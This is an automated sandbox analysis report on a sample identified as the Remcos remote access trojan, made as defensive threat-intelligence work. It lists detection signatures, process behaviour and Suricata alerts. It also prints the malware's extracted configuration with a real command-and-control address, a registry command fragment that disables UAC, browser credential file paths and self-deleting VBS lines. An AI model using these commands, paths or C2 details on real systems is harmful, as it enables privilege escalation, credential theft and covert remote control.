Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
7056ZCiFdE.exe

Overview

General Information

Sample name:7056ZCiFdE.exe
renamed because original name is a hash value
Original sample name:6f0604f8a16b94b61d714dfec11d0358.exe
Analysis ID:1570884
MD5:6f0604f8a16b94b61d714dfec11d0358
SHA1:558828c2ead68ea5883655299a3f0bfad1981ae5
SHA256:28331e2705bf58bd76a9f8ba0f0a431b762eaf6e4284dbf12f1453dd3fecf281
Tags:exeuser-abuse_ch
Infos:

Detection

Remcos
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Contains functionality to bypass UAC (CMSTPLUA)
Detected Remcos RAT
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Drops script at startup location
Sigma detected: Remcos
Suricata IDS alerts for network traffic
Yara detected Remcos RAT
Yara detected UAC Bypass using CMSTP
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
C2 URLs / IPs found in malware configuration
Contains functionality to register a low level keyboard hook
Contains functionality to steal Chrome passwords or cookies
Contains functionality to steal Firefox passwords or cookies
Contains functionalty to change the wallpaper
Delayed program exit found
Drops VBS files to the startup folder
Machine Learning detection for dropped file
Machine Learning detection for sample
Sigma detected: WScript or CScript Dropper
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Abnormal high CPU Usage
Contains functionality for read data from the clipboard
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to download and launch executables
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to enumerate running services
Contains functionality to execute programs as a different user
Contains functionality to launch a control a shell (cmd.exe)
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected potential crypto function
Drops PE files
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (date check)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores files to the Windows start menu directory
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Yara detected Keylogger Generic
Yara signature match

Classification

Process Tree

  • System is w10x64
  • 7056ZCiFdE.exe (PID: 6992 cmdline: "C:\Users\user\Desktop\7056ZCiFdE.exe" MD5: 6F0604F8A16B94B61D714DFEC11D0358)
    • Allene.exe (PID: 7132 cmdline: "C:\Users\user\Desktop\7056ZCiFdE.exe" MD5: 6F0604F8A16B94B61D714DFEC11D0358)
  • wscript.exe (PID: 5812 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Allene.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • Allene.exe (PID: 2872 cmdline: "C:\Users\user\AppData\Local\Milburr\Allene.exe" MD5: 6F0604F8A16B94B61D714DFEC11D0358)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Remcos, RemcosRATRemcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity.
  • APT33
  • The Gorgon Group
  • UAC-0050
https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos

Malware Configuration

Threatname: Remcos

{"Host:Port:Password": ["192.210.150.26:8787:0"], "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-R1T905", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos", "Keylog file max size": ""}

Yara Signatures

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\ProgramData\remcos\logs.datJoeSecurity_RemcosYara detected Remcos RATJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000001.00000002.4155512160.0000000000400000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
      00000001.00000002.4155512160.0000000000400000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
        00000001.00000002.4155512160.0000000000400000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
          00000001.00000002.4155512160.0000000000400000.00000040.00001000.00020000.00000000.sdmpWindows_Trojan_Remcos_b296e965unknownunknown
          • 0x6b6f8:$a1: Remcos restarted by watchdog!
          • 0x6bc70:$a3: %02i:%02i:%02i:%03i
          00000001.00000002.4155512160.0000000000400000.00000040.00001000.00020000.00000000.sdmpREMCOS_RAT_variantsunknownunknown
          • 0x65994:$str_a1: C:\Windows\System32\cmd.exe
          • 0x65910:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
          • 0x65910:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
          • 0x65e10:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
          • 0x66410:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
          • 0x65a04:$str_b2: Executing file:
          • 0x6683c:$str_b3: GetDirectListeningPort
          • 0x66200:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
          • 0x66380:$str_b7: \update.vbs
          • 0x65a2c:$str_b9: Downloaded file:
          • 0x65a18:$str_b10: Downloading file:
          • 0x65abc:$str_b12: Failed to upload file:
          • 0x66804:$str_b13: StartForward
          • 0x66824:$str_b14: StopForward
          • 0x662d8:$str_b15: fso.DeleteFile "
          • 0x6626c:$str_b16: On Error Resume Next
          • 0x66308:$str_b17: fso.DeleteFolder "
          • 0x65aac:$str_b18: Uploaded file:
          • 0x65a6c:$str_b19: Unable to delete:
          • 0x662a0:$str_b20: while fso.FileExists("
          • 0x65f49:$str_c0: [Firefox StoredLogins not found]
          Click to see the 32 entries

          Unpacked PEs

          SourceRuleDescriptionAuthorStrings
          4.2.Allene.exe.400000.0.raw.unpackJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
            4.2.Allene.exe.400000.0.raw.unpackJoeSecurity_RemcosYara detected Remcos RATJoe Security
              4.2.Allene.exe.400000.0.raw.unpackJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
                4.2.Allene.exe.400000.0.raw.unpackWindows_Trojan_Remcos_b296e965unknownunknown
                • 0x6b6f8:$a1: Remcos restarted by watchdog!
                • 0x6bc70:$a3: %02i:%02i:%02i:%03i
                4.2.Allene.exe.400000.0.raw.unpackREMCOS_RAT_variantsunknownunknown
                • 0x65994:$str_a1: C:\Windows\System32\cmd.exe
                • 0x65910:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
                • 0x65910:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
                • 0x65e10:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
                • 0x66410:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
                • 0x65a04:$str_b2: Executing file:
                • 0x6683c:$str_b3: GetDirectListeningPort
                • 0x66200:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
                • 0x66380:$str_b7: \update.vbs
                • 0x65a2c:$str_b9: Downloaded file:
                • 0x65a18:$str_b10: Downloading file:
                • 0x65abc:$str_b12: Failed to upload file:
                • 0x66804:$str_b13: StartForward
                • 0x66824:$str_b14: StopForward
                • 0x662d8:$str_b15: fso.DeleteFile "
                • 0x6626c:$str_b16: On Error Resume Next
                • 0x66308:$str_b17: fso.DeleteFolder "
                • 0x65aac:$str_b18: Uploaded file:
                • 0x65a6c:$str_b19: Unable to delete:
                • 0x662a0:$str_b20: while fso.FileExists("
                • 0x65f49:$str_c0: [Firefox StoredLogins not found]
                Click to see the 43 entries

                Sigma Signatures

                System Summary

                barindex
                Sigma detected: WScript or CScript Dropper
                Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Allene.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Allene.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Allene.vbs" , ProcessId: 5812, ProcessName: wscript.exe
                Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
                Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Allene.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Allene.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Allene.vbs" , ProcessId: 5812, ProcessName: wscript.exe

                Data Obfuscation

                barindex
                Sigma detected: Drops script at startup location
                Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Users\user\AppData\Local\Milburr\Allene.exe, ProcessId: 7132, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Allene.vbs

                Stealing of Sensitive Information

                barindex
                Sigma detected: Remcos
                Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Users\user\AppData\Local\Milburr\Allene.exe, ProcessId: 7132, TargetFilename: C:\ProgramData\remcos\logs.dat

                Suricata Signatures

                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-08T09:31:26.528944+010020327761Malware Command and Control Activity Detected192.168.2.449730192.210.150.268787TCP
                2024-12-08T09:31:29.595606+010020327761Malware Command and Control Activity Detected192.168.2.449731192.210.150.268787TCP
                2024-12-08T09:31:32.658119+010020327761Malware Command and Control Activity Detected192.168.2.449732192.210.150.268787TCP
                2024-12-08T09:31:35.728229+010020327761Malware Command and Control Activity Detected192.168.2.449733192.210.150.268787TCP
                2024-12-08T09:31:38.807210+010020327761Malware Command and Control Activity Detected192.168.2.449736192.210.150.268787TCP
                2024-12-08T09:31:42.470921+010020327761Malware Command and Control Activity Detected192.168.2.449740192.210.150.268787TCP
                2024-12-08T09:31:45.532904+010020327761Malware Command and Control Activity Detected192.168.2.449742192.210.150.268787TCP
                2024-12-08T09:31:48.611483+010020327761Malware Command and Control Activity Detected192.168.2.449743192.210.150.268787TCP
                2024-12-08T09:31:51.674579+010020327761Malware Command and Control Activity Detected192.168.2.449744192.210.150.268787TCP
                2024-12-08T09:31:54.751937+010020327761Malware Command and Control Activity Detected192.168.2.449745192.210.150.268787TCP
                2024-12-08T09:31:57.815944+010020327761Malware Command and Control Activity Detected192.168.2.449746192.210.150.268787TCP
                2024-12-08T09:32:00.892399+010020327761Malware Command and Control Activity Detected192.168.2.449747192.210.150.268787TCP
                2024-12-08T09:32:03.956617+010020327761Malware Command and Control Activity Detected192.168.2.449748192.210.150.268787TCP
                2024-12-08T09:32:07.017381+010020327761Malware Command and Control Activity Detected192.168.2.449749192.210.150.268787TCP
                2024-12-08T09:32:10.079703+010020327761Malware Command and Control Activity Detected192.168.2.449750192.210.150.268787TCP
                2024-12-08T09:32:13.142325+010020327761Malware Command and Control Activity Detected192.168.2.449751192.210.150.268787TCP
                2024-12-08T09:32:16.210805+010020327761Malware Command and Control Activity Detected192.168.2.449752192.210.150.268787TCP
                2024-12-08T09:32:19.345352+010020327761Malware Command and Control Activity Detected192.168.2.449760192.210.150.268787TCP
                2024-12-08T09:32:22.519261+010020327761Malware Command and Control Activity Detected192.168.2.449766192.210.150.268787TCP
                2024-12-08T09:32:25.635191+010020327761Malware Command and Control Activity Detected192.168.2.449772192.210.150.268787TCP
                2024-12-08T09:32:28.695256+010020327761Malware Command and Control Activity Detected192.168.2.449783192.210.150.268787TCP
                2024-12-08T09:32:31.772488+010020327761Malware Command and Control Activity Detected192.168.2.449789192.210.150.268787TCP
                2024-12-08T09:32:34.829535+010020327761Malware Command and Control Activity Detected192.168.2.449800192.210.150.268787TCP
                2024-12-08T09:32:37.893227+010020327761Malware Command and Control Activity Detected192.168.2.449806192.210.150.268787TCP
                2024-12-08T09:32:40.970662+010020327761Malware Command and Control Activity Detected192.168.2.449813192.210.150.268787TCP
                2024-12-08T09:32:44.079602+010020327761Malware Command and Control Activity Detected192.168.2.449823192.210.150.268787TCP
                2024-12-08T09:32:47.174339+010020327761Malware Command and Control Activity Detected192.168.2.449829192.210.150.268787TCP
                2024-12-08T09:32:50.238550+010020327761Malware Command and Control Activity Detected192.168.2.449839192.210.150.268787TCP
                2024-12-08T09:32:53.298839+010020327761Malware Command and Control Activity Detected192.168.2.449845192.210.150.268787TCP
                2024-12-08T09:32:56.363081+010020327761Malware Command and Control Activity Detected192.168.2.449855192.210.150.268787TCP
                2024-12-08T09:32:59.424194+010020327761Malware Command and Control Activity Detected192.168.2.449862192.210.150.268787TCP
                2024-12-08T09:33:02.486513+010020327761Malware Command and Control Activity Detected192.168.2.449869192.210.150.268787TCP
                2024-12-08T09:33:05.561051+010020327761Malware Command and Control Activity Detected192.168.2.449879192.210.150.268787TCP
                2024-12-08T09:33:08.596635+010020327761Malware Command and Control Activity Detected192.168.2.449885192.210.150.268787TCP
                2024-12-08T09:33:11.595406+010020327761Malware Command and Control Activity Detected192.168.2.449895192.210.150.268787TCP
                2024-12-08T09:33:14.591199+010020327761Malware Command and Control Activity Detected192.168.2.449902192.210.150.268787TCP
                2024-12-08T09:33:17.543987+010020327761Malware Command and Control Activity Detected192.168.2.449909192.210.150.268787TCP
                2024-12-08T09:33:20.492642+010020327761Malware Command and Control Activity Detected192.168.2.449918192.210.150.268787TCP
                2024-12-08T09:33:23.393036+010020327761Malware Command and Control Activity Detected192.168.2.449925192.210.150.268787TCP
                2024-12-08T09:33:26.251580+010020327761Malware Command and Control Activity Detected192.168.2.449931192.210.150.268787TCP
                2024-12-08T09:33:29.079820+010020327761Malware Command and Control Activity Detected192.168.2.449940192.210.150.268787TCP
                2024-12-08T09:33:31.892555+010020327761Malware Command and Control Activity Detected192.168.2.449947192.210.150.268787TCP
                2024-12-08T09:33:34.675406+010020327761Malware Command and Control Activity Detected192.168.2.449953192.210.150.268787TCP
                2024-12-08T09:33:37.427204+010020327761Malware Command and Control Activity Detected192.168.2.449961192.210.150.268787TCP
                2024-12-08T09:33:40.158584+010020327761Malware Command and Control Activity Detected192.168.2.449968192.210.150.268787TCP
                2024-12-08T09:33:42.991371+010020327761Malware Command and Control Activity Detected192.168.2.449973192.210.150.268787TCP
                2024-12-08T09:33:45.673458+010020327761Malware Command and Control Activity Detected192.168.2.449978192.210.150.268787TCP
                2024-12-08T09:33:48.346729+010020327761Malware Command and Control Activity Detected192.168.2.449986192.210.150.268787TCP
                2024-12-08T09:33:50.986374+010020327761Malware Command and Control Activity Detected192.168.2.449991192.210.150.268787TCP
                2024-12-08T09:33:53.611415+010020327761Malware Command and Control Activity Detected192.168.2.449997192.210.150.268787TCP
                2024-12-08T09:33:56.220343+010020327761Malware Command and Control Activity Detected192.168.2.450003192.210.150.268787TCP
                2024-12-08T09:33:58.814855+010020327761Malware Command and Control Activity Detected192.168.2.450012192.210.150.268787TCP
                2024-12-08T09:34:01.392010+010020327761Malware Command and Control Activity Detected192.168.2.450019192.210.150.268787TCP
                2024-12-08T09:34:03.956621+010020327761Malware Command and Control Activity Detected192.168.2.450025192.210.150.268787TCP
                2024-12-08T09:34:06.503965+010020327761Malware Command and Control Activity Detected192.168.2.450032192.210.150.268787TCP
                2024-12-08T09:34:09.037256+010020327761Malware Command and Control Activity Detected192.168.2.450038192.210.150.268787TCP
                2024-12-08T09:34:11.609211+010020327761Malware Command and Control Activity Detected192.168.2.450045192.210.150.268787TCP
                2024-12-08T09:34:14.050024+010020327761Malware Command and Control Activity Detected192.168.2.450052192.210.150.268787TCP
                2024-12-08T09:34:16.533571+010020327761Malware Command and Control Activity Detected192.168.2.450060192.210.150.268787TCP
                2024-12-08T09:34:19.006642+010020327761Malware Command and Control Activity Detected192.168.2.450061192.210.150.268787TCP
                2024-12-08T09:34:21.455208+010020327761Malware Command and Control Activity Detected192.168.2.450062192.210.150.268787TCP
                2024-12-08T09:34:23.908152+010020327761Malware Command and Control Activity Detected192.168.2.450063192.210.150.268787TCP
                2024-12-08T09:34:26.488643+010020327761Malware Command and Control Activity Detected192.168.2.450064192.210.150.268787TCP
                2024-12-08T09:34:28.961193+010020327761Malware Command and Control Activity Detected192.168.2.450065192.210.150.268787TCP
                2024-12-08T09:34:31.362755+010020327761Malware Command and Control Activity Detected192.168.2.450066192.210.150.268787TCP
                2024-12-08T09:34:33.754813+010020327761Malware Command and Control Activity Detected192.168.2.450067192.210.150.268787TCP
                2024-12-08T09:34:36.160734+010020327761Malware Command and Control Activity Detected192.168.2.450068192.210.150.268787TCP
                2024-12-08T09:34:38.536759+010020327761Malware Command and Control Activity Detected192.168.2.450069192.210.150.268787TCP
                2024-12-08T09:34:40.892652+010020327761Malware Command and Control Activity Detected192.168.2.450070192.210.150.268787TCP
                2024-12-08T09:34:43.251648+010020327761Malware Command and Control Activity Detected192.168.2.450071192.210.150.268787TCP
                2024-12-08T09:34:45.596680+010020327761Malware Command and Control Activity Detected192.168.2.450072192.210.150.268787TCP
                2024-12-08T09:34:47.942712+010020327761Malware Command and Control Activity Detected192.168.2.450073192.210.150.268787TCP
                2024-12-08T09:34:50.318837+010020327761Malware Command and Control Activity Detected192.168.2.450074192.210.150.268787TCP
                2024-12-08T09:34:52.628203+010020327761Malware Command and Control Activity Detected192.168.2.450075192.210.150.268787TCP
                2024-12-08T09:34:54.938754+010020327761Malware Command and Control Activity Detected192.168.2.450076192.210.150.268787TCP
                2024-12-08T09:34:57.236910+010020327761Malware Command and Control Activity Detected192.168.2.450077192.210.150.268787TCP
                2024-12-08T09:34:59.532736+010020327761Malware Command and Control Activity Detected192.168.2.450078192.210.150.268787TCP
                2024-12-08T09:35:01.814358+010020327761Malware Command and Control Activity Detected192.168.2.450079192.210.150.268787TCP
                2024-12-08T09:35:04.099809+010020327761Malware Command and Control Activity Detected192.168.2.450080192.210.150.268787TCP
                2024-12-08T09:35:06.362784+010020327761Malware Command and Control Activity Detected192.168.2.450081192.210.150.268787TCP
                2024-12-08T09:35:08.628706+010020327761Malware Command and Control Activity Detected192.168.2.450082192.210.150.268787TCP
                2024-12-08T09:35:10.892259+010020327761Malware Command and Control Activity Detected192.168.2.450083192.210.150.268787TCP
                2024-12-08T09:35:13.142100+010020327761Malware Command and Control Activity Detected192.168.2.450084192.210.150.268787TCP
                2024-12-08T09:35:15.394803+010020327761Malware Command and Control Activity Detected192.168.2.450085192.210.150.268787TCP
                2024-12-08T09:35:17.627081+010020327761Malware Command and Control Activity Detected192.168.2.450086192.210.150.268787TCP
                2024-12-08T09:35:19.860754+010020327761Malware Command and Control Activity Detected192.168.2.450087192.210.150.268787TCP
                2024-12-08T09:35:22.095104+010020327761Malware Command and Control Activity Detected192.168.2.450088192.210.150.268787TCP
                2024-12-08T09:35:24.329740+010020327761Malware Command and Control Activity Detected192.168.2.450089192.210.150.268787TCP

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Found malware configuration
                Source: 00000004.00000002.1920045593.0000000001948000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: Remcos {"Host:Port:Password": ["192.210.150.26:8787:0"], "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-R1T905", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos", "Keylog file max size": ""}
                Multi AV Scanner detection for dropped file
                Source: C:\Users\user\AppData\Local\Milburr\Allene.exeReversingLabs: Detection: 55%
                Source: C:\Users\user\AppData\Local\Milburr\Allene.exeVirustotal: Detection: 66%Perma Link
                Multi AV Scanner detection for submitted file
                Source: 7056ZCiFdE.exeReversingLabs: Detection: 55%
                Source: 7056ZCiFdE.exeVirustotal: Detection: 66%Perma Link
                Yara detected Remcos RAT
                Source: Yara matchFile source: 4.2.Allene.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 4.2.Allene.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.2.Allene.exe.3920000.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.2.Allene.exe.3920000.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 4.2.Allene.exe.18b0000.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.2.Allene.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 4.2.Allene.exe.18b0000.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.2.Allene.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000001.00000002.4155512160.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.1920045593.0000000001948000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.4156569703.00000000012B3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.1919987718.00000000018B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.1919363155.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.4156176304.0000000001058000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.4157121061.0000000003DDE000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.4157009146.0000000003920000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.4156339648.00000000010FD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: Allene.exe PID: 7132, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: Allene.exe PID: 2872, type: MEMORYSTR
                Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED
                AI detected suspicious sample
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.5% probability
                Machine Learning detection for dropped file
                Source: C:\Users\user\AppData\Local\Milburr\Allene.exeJoe Sandbox ML: detected
                Machine Learning detection for sample
                Source: 7056ZCiFdE.exeJoe Sandbox ML: detected
                Source: C:\Users\user\AppData\Local\Milburr\Allene.exeCode function: 1_2_0043293A CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,1_2_0043293A
                Source: Allene.exeBinary or memory string: -----BEGIN PUBLIC KEY-----

                Exploits

                barindex
                Yara detected UAC Bypass using CMSTP
                Source: Yara matchFile source: 4.2.Allene.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 4.2.Allene.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.2.Allene.exe.3920000.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.2.Allene.exe.3920000.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 4.2.Allene.exe.18b0000.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.2.Allene.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 4.2.Allene.exe.18b0000.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.2.Allene.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000001.00000002.4155512160.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.1919987718.00000000018B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.1919363155.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.4157009146.0000000003920000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: Allene.exe PID: 7132, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: Allene.exe PID: 2872, type: MEMORYSTR

                Privilege Escalation

                barindex
                Contains functionality to bypass UAC (CMSTPLUA)
                Source: C:\Users\user\AppData\Local\Milburr\Allene.exeCode function: 1_2_00406764 _wcslen,CoGetObject,1_2_00406764
                Source: 7056ZCiFdE.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                Source: C:\Users\user\Desktop\7056ZCiFdE.exeCode function: 0_2_008E445A GetFileAttributesW,FindFirstFileW,FindClose,0_2_008E445A
                Source: C:\Users\user\Desktop\7056ZCiFdE.exeCode function: 0_2_008EC6D1 FindFirstFileW,FindClose,0_2_008EC6D1
                Source: C:\Users\user\Desktop\7056ZCiFdE.exeCode function: 0_2_008EC75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_008EC75C
                Source: C:\Users\user\Desktop\7056ZCiFdE.exeCode function: 0_2_008EEF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_008EEF95
                Source: C:\Users\user\Desktop\7056ZCiFdE.exeCode function: 0_2_008EF0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_008EF0F2
                Source: C:\Users\user\Desktop\7056ZCiFdE.exeCode function: 0_2_008EF3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_008EF3F3
